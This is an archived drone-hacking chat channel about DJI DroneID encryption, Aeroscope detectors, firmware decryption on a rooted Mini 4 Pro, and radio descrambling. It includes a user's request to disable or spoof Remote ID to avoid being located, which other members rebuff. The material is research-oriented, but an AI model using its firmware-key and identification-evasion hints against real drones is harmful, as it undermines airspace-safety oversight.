[2024-03-01 15:39:29] dkovar : quelle surprise

[2024-03-02 07:24:23] eseven : Really useful to reverse usb comms!!

[2024-03-02 11:59:54] jcase : and to debug usb based exploits lol

[2024-03-02 16:35:55] efwefaf : Does anyone need the RC PLUS remote control? It can be modified to support M300 M350 M3E M3T M3M M30T Mavic 3 3C 3PRO MINI3 AIR2S Inspire 3

[2024-03-02 16:36:19] efwefaf :

[2024-03-05 12:46:51] fenerx03 : fenerx03 joined the channel.

[2024-03-05 19:50:25] tissy : Does anyone know, is there a specific pattern or format to DJI serial numbers that can aid in identifying different models please?

[2024-03-05 21:17:56] cs2000 : There was a tool on the wiki (http://tools.retroroms.info/) that could decode the serial numbers, but it seems to be broken. He probably does not come here anymore though, but will tag @czokie incase he sees this message and feels like fixing it.

[2024-03-06 00:10:24] czokie : Hey. Got the ping. Let me have a peek at it.

[2024-03-06 00:33:27] czokie : Fixed. The back-end has stuff in a stored procedure, and the stored procedure table was marked as crashed in the database. Repaired and back up.

[2024-03-06 01:23:18] johnnokomis : I'm seeking information on how to perform this firmware mod. Is it the same process as changing an RC Pro Enterprise to a regular RC Pro? I've done that many times, but DJI Fly disappears the moment you reboot the RC. Does the same not happen with the RC Plus?

[2024-03-06 01:40:09] tissy : Thank you @czokie. Does this support certain devices or all please?

[2024-03-06 08:13:58] czokie : It will get the date for any device - identification of which device it is ... thats based on a lookup table that I will update one day, but less important - if you've already got the device, you know what it is :)

[2024-03-07 21:05:08] jcase : writeup on the dongle https://www.edgesource.com/c-suas/

[2024-03-07 21:13:17] dkovar : Nice work.

[2024-03-08 05:36:17] djihacker : djihacker joined the channel.

[2024-03-08 09:48:17] djihacker : So without the private key in aeroscope, decrypting droneID would be impossible.

[2024-03-08 12:19:49] jcase : that is not necessarily true

[2024-03-08 13:41:19] djihacker : After reading the article you shared, I think there is a fixed public key in the firmware (paired with the private key in aeroScope) used to encrypt the public and private key pair for starting the drone. After the encryption is completed, it is thrown to the cloud. This key-map is stored in the cloud. Subsequent DroneIDs are encrypted using the public key generated at startup, and then packaged. The public key is exposed in the DroneID encryption package and sent to the aeroScope end. The aeroScope end decrypts it through the private key in the received key-map. This DroneID data, so if you want to decrypt the DroneID, you need to first obtain the private key generated by the drone. The private key generated by the drone is encrypted with the public key of aeroScope. Only the private key is stored in the dongle of aeroScope to decrypt it. :pleading_face:

[2024-03-08 13:43:38] djihacker : After reading the article you shared, I think there is a fixed public key in the firmware (paired with the private key in aeroScope) that is used to encrypt the public and private key pairs generated after the drone is turned on. After the encryption is completed, it is sent to aeroScope, aeroScope stores this key-map. Subsequent DroneIDs are encrypted using the public key generated at startup, and then packaged. The public key is exposed in the DroneID encryption package and sent to the aeroScope end. The aeroScope end uses the private key in the received key-map. Key to decrypt this DroneID data, so if you want to decrypt DroneID, you need to first obtain the private key generated by the drone. The private key generated by the drone is encrypted with the public key of aeroScope. Only the private key is stored in the dongle of aeroScope. Decrypt it.

[2024-03-08 13:45:20] jcase : session id

[2024-03-08 13:45:52] jcase : the dongle has a private key, decryptions the session id, and spits out an aes key

[2024-03-08 13:50:46] djihacker : Yes I totally agree with you, but I haven't verified it yet. Currently I just rooted my dji mini 4 pro and executed reboot -p and it still sends DroneID pkt, I don't even know where to analyze its encryption process.

[2024-03-08 14:02:51] jcase : its in teh flight controller

[2024-03-08 14:03:03] jcase : mini4 pro is actually one i have not seen

[2024-03-08 14:03:17] jcase : is your work on it public

[2024-03-08 14:10:14] djihacker : OK Thank you very much. I am preparing to analyze FC haha. I will use my spare time in the next week to complete this interesting topic and make it public. Mini 4 pro has two emmcs, where did the fc firmware come from? Is there any way to debug it? Is the best way to use ida static analysis? :grinning:

[2024-03-08 14:32:45] djihacker : I found a way to analyze it, so cool.

[2024-03-09 08:21:18] djihacker : There is a problem, when using dji_imah_fwsig.py to unpack the .sig file, there is an exception: /Users/mac/Desktop/_V01.00.0300_wa140_dji_system.bin.extracted/wa140_1502_v10.08.04.08_20231220.pro.fw.sig: Warning: Image file head signature verification caused cryptographic exception: Incorrect signature Error: Image file head signature verification failed. Is it because the decryption key is incorrect? Where should I find the secret key?

[2024-03-09 10:19:43] djihacker : I downloaded the latest firmware of dji mini 4 pro from DDD, and used binwalk to export some .sig files, and then used dji_imah_fwsig.py to decrypt, but it reported an error and analyzed the code and found that the key was wrong, so I want to know how to do it Looking for key? Analyze dji_upgrade and extract it from it?

[2024-03-09 12:32:08] jcase : since you have root on the device, you could eitehr dump decrypted firmware off it, or you can follow back where the key comes from when it updates

[2024-03-09 13:09:10] djihacker : OK, thank you for the idea, I'm analyzing it. There is an interesting thing, mini4 pro has two emmc storage, and both have linux system files. The contents in start_dji_system.sh can be observed to be different. There are also many core dji_xxx.so of different sizes, even when I After executing reboot -p, my mini 4 pro can continue to connect to rc, which is really shocking. Maybe the Linux system in another emmc storage is working, which means that I can only root through this emmc. Analyze the decryption key of the firmware and then extract the FC?

[2024-03-09 13:13:38] djihacker : OK, thank you for the idea, I'm analyzing it. There is an interesting thing, mini4 pro has two emmc storage, and both have linux system files. The contents in start_dji_system.sh can be observed to be different. There are also many core dji_xxx.so of different sizes, even when I After executing reboot -p, my mini 4 pro can continue to connect to rc, which is really shocking. Maybe the Linux system in another emmc storage is working. Is there fc firmware in the emmc that I currently have root permissions on? If so, I can directly extract the FC. But parsing the bin firmware is a very interesting thing, and I will continue to complete this task in the future.

[2024-03-10 18:10:08] jcase : this is common

[2024-03-12 15:50:39] sdfg4711 : sdfg4711 joined the channel.

[2024-03-13 06:48:40] djihacker : When I hook this address, this will cause a crash. I don't know if inline hooks are unstable. Is there a better way to get the value of W8 register?

[2024-03-13 07:20:32] djihacker : I see the problem, I should not write leave, because it is inline :rolling_on_the_floor_laughing:

[2024-03-21 10:39:34] urca87 : @tmbinc and @hito_no_yume, could I trouble you guys over this old thread? I'm trying to analyze the first 2 symbols of a few downlink packages recorded without RC connection, but I have a few doubts and maybe I didn't fully understand what you where saying.

[2024-03-21 10:51:56] urca87 : @tmbinc and @hito_no_yume , could I trouble you guys over this old thread? I'm trying to analyze the first 2 symbols of a few downlink bursts recorded without RC connection, but I have a few doubts and maybe I didn't fully understand what you where talking about. Once I've removed those 4 every 20 bits that differ among different bursts (except 8 bits at the beginning and other 8 at the end that do not follow this scheme precisely), I cannot isolate the golden seed and I have a few doubts about it: - you're are talking about 78 bits, but shouldn't the golden seed's x2_init be 31 bits long? - I've also tried to search for the repetition of these 78 bits among the 1920 I've extracted from the first two symbols, but without any match. Am I missing some steps? Your help would be appreciated.

[2024-03-21 10:51:56] urca87 : @tmbinc and @hito_no_yume , could I trouble you guys over this old thread? I'm trying to analyze the first 2 symbols of a few downlink bursts recorded without RC connection, but I have a few doubts and maybe I didn't fully understand what you where talking about. Once I've removed those 4 every 20 bits that differ among different bursts (except 8 bits at the beginning and other 8 at the end that do not follow this scheme precisely), I cannot isolate the golden seed and I have a few doubts about it: - you're talking about 78 bits, but shouldn't the golden seed's x2_init be 31 bits long? - I've also tried to search for the repetition of these 78 bits among the 1920 I've extracted from the first two symbols, but without any match. Am I missing some steps? Your help would be appreciated.

[2024-03-22 00:29:01] jcase : does anyone have an up to date aeroscope WITH crystal sky?

[2024-03-22 01:00:25] hito_no_yume : I don't quite remember the actual values, but if you removed the differing bits and then XORed with the right golden sequence you will get repeating bits. You won't find repeating bits before descrambling. I think also If you look at enough captures, sometimes you could also see a golden sequence in the first few symbols, but that doesn't happen frequently I believe and maybe it doesn't also apply to every drones I don't know

[2024-03-22 08:54:53] urca87 : I think I got confused on some concepts, in my previous understanding the first symbols were not scrambled, I will try to get more into the concept behind the golden sequence. Anyway, thanks a lot for your response hito

[2024-03-22 13:06:22] fr3style : fr3style joined the channel.

[2024-03-26 08:21:37] mrwg888 : mrwg888 joined the channel.

[2024-04-04 19:11:03] propz : propz joined the channel.

[2024-04-04 22:56:45] amat : amat joined the channel.

[2024-04-11 13:09:49] halowarrior8 : halowarrior8 joined the channel.

[2024-04-13 01:54:33] antf1551 : antf1551 joined the channel.

[2024-04-13 17:56:26] the_mini2_guy : the_mini2_guy joined the channel.

[2024-04-16 05:41:12] metalhax : metalhax joined the channel.

[2024-05-02 07:38:27] s1m0n : Guys, I have an Air3 with deactivated DroneID. Latest firmware and latest DJI Fly version. The problem is that RID is still being sent. That means any idiot can locate me with a smartphone and doesn't need an Aeroscope. Is there a way to turn off RID as well or to fake/spoof the values?

[2024-05-03 00:37:03] jcase : what makes you think you deactivated drone ID?

[2024-05-03 07:07:18] s1m0n : Because CIAJD displayed 1111111 everywhere. When I pressed the disabled command, an error occurred. After I sent the drone away and got it back, CIAJD now shows 00000000. So something has to be changed, or am I seeing it wrong? Do you know of any ways to make CIAJD display incorrect values?

[2024-05-03 07:15:52] s1m0n : As far as I know, DJI has removed the command, but the possibility to read the status (DroneID) still exists

[2024-05-03 07:15:52] s1m0n : As far as I know, DJI has removed the command, but the possibility to read the status still exists

[2024-05-03 14:31:43] jcase : @s1m0n CIAJD NEVER disabled AS

[2024-05-03 14:31:52] jcase : it censored some parts of it one some devices

[2024-05-03 14:32:37] jcase : your drone doesnt have AS disabled.

[2024-05-03 17:03:48] s1m0n : Do you have an explanation for why or how the values can permanently display 0000000?

[2024-05-03 17:06:40] konraditurbe : Bug / leftover code in the firmware. But all useless.

[2024-05-03 17:12:49] s1m0n : Well, if that were the case, then there must be someone here who can explain how to trigger this error? After all, this service was offered to me and, as far as I can check, it was also provided. So if this is all a mistake, can someone please explain how someone else can bring about this permanent change? (No Matter If its realy Works or just showing wrong value)

[2024-05-03 17:12:49] s1m0n : Well, if that were the case, then there must be someone here who can explain how to trigger this error? After all, this service was offered to me and, as far as I can check, it was also provided. So if this is all a "bug", can someone please explain how someone else can bring about this permanent change? (No Matter If its realy Works or just showing wrong value)

[2024-05-03 20:22:10] jcase : yes i can make them display 0000000 at all times, it doesnt disable drone id

[2024-05-03 20:22:47] jcase : privacy bits can not fucking be used to disable drone id

[2024-05-03 20:22:52] jcase : not sure how many times i have to say that in here

[2024-05-03 21:25:26] s1m0n : I don't understand how many times I have to tell the professionals that this is a reference! Until FW 01.01.0400 it was possible for me to read the status of CIAJD and to SEND the "Disabled Command" (this is the name of the button in CIAJD = comm_serialtalk command). The status then displayed 0000000, but jumped back to 111111111 on the first takeoff of the drone, as the recommend Fly version 1.5.10 cannot be used with the Air3. With the introduction of FW 01.00.0600 it was only possible to read the status with CIAJD. If you try to send the "Disabled Command", you get an error and the status no longer changes. After I have sent my Air3 to a service center in another country, the status permanently shows 0000000. So far so clear ? So you are able to fake this status? may I ask if you know of any verification methods (other than AS) to check if such a fake has been applied?

[2024-05-03 21:26:00] s1m0n : I don't understand how many times I have to tell the professionals that this is a reference! Until FW 01.01.0400 it was possible for me to read the status of CIAJD and to SEND the "Disabled Command" (this is the name of the button in CIAJD = comm_serialtalk command). The status then displayed 0000000, but jumped back to 111111111 on the first takeoff of the drone, as the recommend Fly version 1.5.10 cannot be used with the Air3. With the introduction of FW 01.00.0600 it was only possible to read the status with CIAJD. If you try to send the "Disabled Command", you get an error and the status no longer changes. After I have sent my Air3 to a service center in another country, the status permanently shows 0000000. So far so clear ? So you are able to fake this status? may I ask if you know of any verification methods (other than AS) to check if such a fake has been applied?

[2024-05-03 21:28:00] s1m0n : Would such an intervention retain all user-defined settings (parameter settings, FCC patch), or would the drone be reset to factory settings?

[2024-05-03 21:28:36] konraditurbe : Leave it seriously. It's not possible on Air 3 unless you get access to some very secretive firmware which I doubt even exists.

[2024-05-03 21:32:08] s1m0n : I'm sorry, but it doesn't make sense for me to send my Air3 across several countries and receive it back again if it's a scam.

[2024-05-03 21:32:08] s1m0n : I'm sorry, but it doesn't make sense for me to send my Air3 across several countries and receive it back again if it's a scam. The service b

[2024-05-03 21:35:38] s1m0n : But if there is someone here who has an older biography and is trustworthy and has an AS to verify or disprove it, I would be willing to send the drone again. So please contact me? Nevertheless, I will sell the drone as soon as I can. It doesn't make sense with Remote ID like it does with Drone ID

[2024-05-03 21:35:38] s1m0n : But if there is someone here who has an older biography and is trustworthy and has an AS to verify or disprove it, I would be willing to send the drone again. So please contact me? Nevertheless, I will sell the drone as soon as I can. The whole thing makes just as little sense with Remote ID as it does with Drone ID

[2024-05-03 21:35:38] s1m0n : But if there is someone here who has an older biography and is trustworthy and has an AS to verify or disprove it, I would be willing to send the drone again. So please contact me? Nevertheless, I will sell the drone as soon as I can. Nevertheless, I will sell the drone as soon as I can. It doesn't make sense with Remote ID like it does with Drone ID

[2024-05-03 21:45:03] s1m0n : Why should it be a special firmware? Is this procedure no longer valid? Or do you seriously believe that DJI would send the customer a firmware that has not yet been leaked? @konraditurbe

[2024-05-03 21:46:55] s1m0n : I know that "flysafe" no longer exists, but that doesn't change the fact that there was an official procedure, or has it been discontinued?

[2024-05-03 21:48:02] konraditurbe : "Is this procedure no longer valid" exactly, CIAJeepDoors is no longer valid. It was "valid" for 1-2 months at most. And "valid" is a big word, it didn't do what many thought it did.

[2024-05-03 21:48:48] s1m0n : Am I talking about CIAJD, or official refer to dji?

[2024-05-03 21:49:01] konraditurbe : Do what I did, get an Air 2 and Air 2S, next purchases I'll do will be Mini 2 (Gen 1/2 compatible with jeep doors) and Mavic 3 wm260.

[2024-05-03 21:50:15] konraditurbe : That paragraph you posted is KF pondering *why* DJI does not handle this. It never existed. DJI never acknowledged the privacy bits, so "fly safe" here is irrelevant.

[2024-05-03 21:54:16] s1m0n : I myself have a Mavic Pro Platinum, 3 or 4 mini2 and an Air2s. That's not the thing! And it doesn't help to find out whether a fraudster is on the move or not. I see it differently. Back then, you didn't install a switch if you didn't use it ?‍♂️

[2024-05-03 22:28:03] jcase : @konraditurbe privacy bits were initially for a non public edition of flight apps

[2024-05-03 22:28:46] jcase : At least that is where I first saw settings and documentation on it

[2024-05-03 22:32:32] jcase : @s1m0n 99% of the ppl that talk about disabling drone id don't have the capability to detect it or not. Ciajd just censors ( better than nothing if you need it but not for evading detection).

[2024-05-04 01:17:46] s1m0n : CIAJD served me well for 2 years. Then I had the Air3, flew 11 times in 4 days and had a visit from air security

[2024-05-04 01:21:42] jcase : thats great, its not a droneid disable, it censors some parts

[2024-05-04 01:57:14] s1m0n : Yes, I know. I've been toying with switching to custom drone for a while now, the problem is that if I did I would want the o3 system and that also sends the DroneID as far as I could find out. Maybe it's time to get rid of those drones and just keep the mini2... that's actually enough for relaxed flying

[2024-05-06 19:46:58] pingspike : anyone have a mobile aeroscope for sale? must be willing to ship to the UK via international insured courier (UPS, DHL, FexEx, etc)

[2024-05-06 21:38:52] dkovar : What are you offering?

[2024-05-07 06:36:16] pingspike : What's the going rate on the second hand market? :shrug_light_skin_tone: These things seem almost impossible to find these days :thinking_face:

[2024-05-07 06:44:48] pingspike : Ok, just found out how much they go for, I'll withdraw my request now and wear a rather sheepish look on my face for the rest of the day ??

[2024-05-07 12:34:09] dkovar : Since I have one, can you share the going price?

[2024-05-07 12:45:43] sarange : sarange joined the channel.

[2024-05-07 14:00:52] jcase : the last retail price i saw was $20,000, however ive heard of people offering and paying more now due to shrotage

[2024-05-07 14:38:01] konraditurbe : 20k without upgrade module that is, no?

[2024-05-07 15:04:51] dkovar : Wow.

[2024-05-07 15:20:11] jcase : Does (And im use the wrong term here, im not an SDR person) have a "data stream" from a SDR of droneid packets?

[2024-05-07 15:20:25] jcase : like raw?

[2024-05-07 15:20:55] jcase : my SDR unfortunately got damaged, and i an academic friend asked for an example

[2024-05-07 15:21:17] jcase : freaking sdr appears to have a short between layers, i ended up pulling ALL the components off it .. and still have a short

[2024-05-07 16:07:58] tmbinc : "IQ recording" https://github.com/RUB-SysSec/DroneSecurity/tree/public_squash/samples has samples.

[2024-05-07 18:12:08] jcase : @tmbinc thank you

[2024-05-09 00:02:26] punishman : punishman joined the channel.

[2024-05-10 20:14:50] indimind : indimind joined the channel.

[2024-05-12 14:30:16] symza : symza joined the channel.

[2024-05-17 11:29:56] hash512 : hash512 joined the channel.

[2024-05-19 11:45:02] efwefaf : Does anyone know how to change the img file and recalculate the CRC verification

[2024-05-20 08:14:47] fruits_biology : fruits_biology joined the channel.

[2024-05-22 01:53:11] djihacker : Does anyone know how to extract firmware from a usb device

[2024-05-22 02:25:56] caracara : caracara joined the channel.

[2024-05-23 14:53:07] jcase : this is a super vague question. Yes i do, but only applies to devices ive done it to. What device are you talking about

[2024-05-24 05:31:56] djihacker : A friend gave me a dongle to get the algorithm inside, and I didn't know where to start working.

[2024-06-03 07:34:53] mymail : mymail joined the channel.

[2024-06-03 14:42:33] devinnorgarb : devinnorgarb joined the channel.

[2024-06-07 08:34:59] ginostred : Hello everyone, I have a question about the frequencies used to transmit droneID packets. Does anyone know if the hopping sequence varies from drone to drone? I noticed that the list of channels on which droneID packets are sent is not always the same from various references found online. Based on my experience using an Air 2, for example, I am unable to find droneID packets on certain frequencies like 2399.5 MHz and 2474.5 MHz

[2024-06-13 13:52:28] qw591132059. : qw591132059. joined the channel.

[2024-06-15 18:06:47] beammp : beammp joined the channel.

[2024-06-19 10:41:04] enk2022 : did you see these two frequencies?

[2024-06-21 07:04:25] ginostred : No. I also checked with a DJI FPV of a friend but couldn't see any packet on those frequencies. I guess the hopping sequence it's a variable pattern, because 2399.5 MHz has been found in here https://github.com/proto17/dji_droneid and 2474.5 MHz was found here https://doi.org/10.48550/arXiv.2207.10795

[2024-06-22 22:40:49] qr25 : qr25 joined the channel.

[2024-06-24 14:34:49] devnull : devnull joined the channel.

[2024-06-26 13:40:30] kowoos : kowoos joined the channel.

[2024-06-26 23:33:10] johnibhramin : johnibhramin joined the channel.

[2024-07-01 17:28:58] mrsmith : mrsmith joined the channel.

[2024-07-06 14:18:16] chengcheng : chengcheng joined the channel.

[2024-07-07 13:59:49] skynettech : skynettech joined the channel.

[2024-07-20 10:08:12] cforge : cforge joined the channel.

[2024-07-23 22:19:16] mgri3 : mgri3 joined the channel.

[2024-07-24 12:18:13] d0ps : d0ps joined the channel.

[2024-07-24 20:41:59] strawhat99 : strawhat99 joined the channel.

[2024-07-26 15:52:30] ogini_ayotanom : ogini_ayotanom joined the channel.

[2024-07-31 20:59:42] hate : hate joined the channel.

[2024-07-31 21:01:34] hate : And here i am. Back to where I started.

[2024-08-01 10:23:57] pingspike : :eyes:

[2024-08-02 11:49:47] hate : Guys, droneid remoteid are only broadcasted on 2.4, 5.2, 5.8 right? No other frequenties?

[2024-08-02 11:50:14] hate : Just between those right?

[2024-08-02 17:15:30] eseven : 5.2?

[2024-08-03 15:02:20] zhangbajie : zhangbajie joined the channel.

[2024-08-06 12:21:19] superfokeryou : superfokeryou joined the channel.

[2024-08-14 20:44:14] dezz : dezz joined the channel.

[2024-08-16 13:54:48] yoyo : yoyo joined the channel.

[2024-08-17 11:04:58] gg02 : gg02 joined the channel.

[2024-08-17 19:41:47] zyxel : zyxel joined the channel.

[2024-08-22 14:38:12] swaggyc : swaggyc joined the channel.

[2024-08-31 05:46:42] zar1n : zar1n joined the channel.

[2024-09-02 01:41:24] devoir : devoir joined the channel.

[2024-09-15 22:40:24] east2west : east2west joined the channel.

[2024-09-22 18:10:28] mangobot : mangobot joined the channel.

[2024-10-07 18:42:54] tokertm : tokertm joined the channel.

[2024-10-09 08:31:13] vikvel : vikvel joined the channel.

[2024-10-09 08:49:50] vikvel : Hi! Can you tell me how to flash the aeroscope with a new firmware (offline)?

[2024-10-09 18:02:04] tissy : When you say "flash" are you referring to the upgrade with the dongle?

[2024-10-21 01:52:56] supermario7331 : supermario7331 joined the channel.

[2024-11-08 12:50:04] jcase : If anyone in the US is looking for CUAS sensors, I have a couple available at a steep discount. Located in North Carolina. Works on a lot of manufacturers, remoteid, droneid + encrypted drone id. Need them out of the work space, going different direction.

[2024-11-08 12:50:04] jcase : If anyone in the US is looking for CUAS sensors, I have a couple available at a steep discount. Located in North Carolina. Works on a lot of manufacturers, various types of traditional detection in addittion to remoteid, droneid + encrypted drone id. Need them out of the work space, going different direction.

[2024-11-08 13:51:32] cyberdjomla : cyberdjomla joined the channel.

[2024-11-13 09:13:15] rachfly : which direction? :) And which systems do you sell?

[2024-11-14 05:29:13] ghhh : - If you are selling the product, can you tell me the catalog or website? And is it only sold in the United States?

[2024-11-21 14:25:54] jcase : its a lizheng df8, not a product "im selling" just unneeded equipment, US only

[2024-11-21 15:45:53] jcase : I've spun up a discord server geared towards the CUAS/UAV/UAS professional, mainly security, policy, forensics, red teams, etc. If there is interest https://discord.com/invite/CDJ2ZBk7Av . Anyonw is welcome but it is not geared towards the "how do i turn off droneid" or the "how do i remove NFZ" crowds. Do expect law enforcement members.

[2024-11-21 15:45:53] jcase : I've spun up a discord server geared towards the CUAS/UAV/UAS professional, mainly security, policy, forensics, red teams, etc. If there is interest https://discord.gg/CDJ2ZBk7Av . Anyonw is welcome but it is not geared towards the "how do i turn off droneid" or the "how do i remove NFZ" crowds. Do expect law enforcement members.

[2024-11-21 15:45:53] jcase : I've spun up a discord server geared towards the CUAS/UAV/UAS professional, mainly security, policy, forensics, red teams, etc. If there is interest https://discord.gg/XS3YRFa3 . Anyonw is welcome but it is not geared towards the "how do i turn off droneid" or the "how do i remove NFZ" crowds. Do expect law enforcement members.

[2024-11-24 12:12:42] ox3d : ox3d joined the channel.

[2024-11-26 18:08:53] isleemo : isleemo joined the channel.

[2024-12-02 14:53:54] karbauskis.karbauskis : karbauskis.karbauskis joined the channel.

[2024-12-03 10:37:34] bearer : bearer joined the channel.

[2024-12-16 12:30:14] c3podaniel : c3podaniel joined the channel.

[2024-12-19 00:38:35] jayj : jayj joined the channel.

[2025-01-08 20:36:06] mikha_fpv : mikha_fpv joined the channel.

[2025-01-15 18:24:17] xexe : xexe joined the channel.

[2025-01-17 16:01:52] skyninja : Does anybody know what the Skylink on the Autel EVO Max is based on? Do they use a certain chip?

DJI-Rev Mattermost Archive

Messages in aeroscope-droneid

DJI-Rev Mattermost Archive

Messages in aeroscope-droneid

User Info